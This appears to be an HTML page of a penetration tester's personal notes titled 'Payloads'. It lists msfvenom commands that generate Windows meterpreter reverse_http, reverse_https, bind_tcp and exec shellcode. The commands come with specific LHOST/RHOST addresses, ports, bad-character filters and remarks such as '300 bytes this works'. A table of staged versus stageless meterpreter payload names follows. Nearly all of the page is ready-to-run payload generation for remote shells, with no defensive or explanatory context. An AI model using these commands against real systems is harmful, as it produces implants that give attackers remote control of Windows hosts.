<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Payloads</title>
</head><body>payload templates<br/>
<br/>
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.16.40.5 LPORT=80 -f c --platform windows -h -b "\x00\x30" &nbsp; &lt;------600 bytes<br/>
<br/>
<br/>
msfvenom -p windows/meterpreter/bind_tcp RHOST=10.185.10.20 LPORT=443 -f c --platform windows --smallest -b "\x00\x30"<br/>
<br/>
<br/>
msfvenom -p windows/meterpreter/bind_tcp RHOST=10.185.10.20 LPORT=443 -f c --platform windows --smallest -b "\x00\x30" &nbsp;&lt;--300 bytes this works<br/>
<br/>
msfvenom -p windows/meterpreter/bind_tcp RHOST=10.185.10.55 LPORT=443 -f c --platform windows --smallest -b "\x00\x30" &nbsp;&lt;--300 bytes this works<br/>
<br/>
<br/>
msfvenom -p windows/exec -f c --platform windows cmd="enter windowd command here" -b "\x00\x30"<br/>
<br/>
&nbsp; &nbsp; &nbsp;<br/>
&nbsp; &nbsp; &nbsp;<br/>
<span style="color: #0a0a0a"><span style="font-family: Arial"><span style="font-size: 10pt"><b>Staged Payloads &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Stageless Payloads<br/>
<br/>
</b></span></span></span><span style="font-family: Arial"><span style="font-size: 10pt"><span style="color: #55585a">windows/meterpreter/reverse_tcp</span></span></span>&nbsp; &nbsp;&#09;&#09;&#09; &nbsp; &nbsp; &nbsp;<span style="color: #55585a"><span style="font-family: Arial"><span style="font-size: 10pt">windows/meterpreter_reverse_tcp</span></span></span>&nbsp; &nbsp;<br/>
<br/>
<span style="font-size: 10pt"><span style="font-family: Arial"><span style="color: #55585a">windows/meterpreter/reverse_https</span></span></span>&nbsp; &nbsp;&#09;&#09;&#09; &nbsp; &nbsp; &nbsp;<span style="font-size: 10pt"><span style="font-family: Arial"><span style="color: #55585a">windows/meterpreter_reverse_https</span></span></span>&nbsp; <br/>
<br/>
<span style="font-size: 10pt"><span style="font-family: Arial"><span style="color: #55585a">windows/meterpreter/reverse_tcp</span></span></span>&nbsp; &nbsp;&#09;&#09;&#09; &nbsp; &nbsp; &nbsp;<span style="font-size: 10pt"><span style="font-family: Arial"><span style="color: #55585a">windows/meterpreter_reverse_tcp</span></span></span>&nbsp; <br/>
<br/>
<br/>
msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.0.16 LPORT=8443 <br/>
</body></html>